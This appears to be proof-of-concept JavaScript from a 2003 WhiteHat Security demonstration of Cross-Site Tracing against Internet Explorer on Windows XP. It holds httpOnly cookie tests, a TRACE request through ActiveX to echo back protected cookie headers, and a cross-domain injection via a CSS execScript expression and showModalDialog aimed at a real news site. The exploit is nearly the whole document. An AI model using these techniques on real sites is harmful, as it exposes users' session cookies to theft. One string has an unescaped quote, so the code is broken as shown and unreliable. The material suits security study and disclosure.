Tested on initial installation of Windows XP with bundled Internet Explorer
<![CDATA[
<script type="text/javascript">
<!--
function normalCookie() {
document.cookie = "TheCookieName=CookieValue";
alert(document.cookie);
}
function httpOnlyCookie() {
document.cookie = "TheCookieName=CookieValue; httpOnly";
alert(document.cookie);
}
function showCookie() {
alert(document.cookie);
}
//-->
</script>
]]>
<![CDATA[
<script type="text/javascript">
<!--
function sendTrace (url) {
var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE", url,false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}
function xssDomainTraceRequest(){
var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://www.cnet.com/",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;";
var target = "http://www.cnet.com/";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
showModalDialog(target, null, readyCode);
}
//-->
</script>
]]>
WhiteHat Securty XST Demonstration @ BlackHat Seattle 2003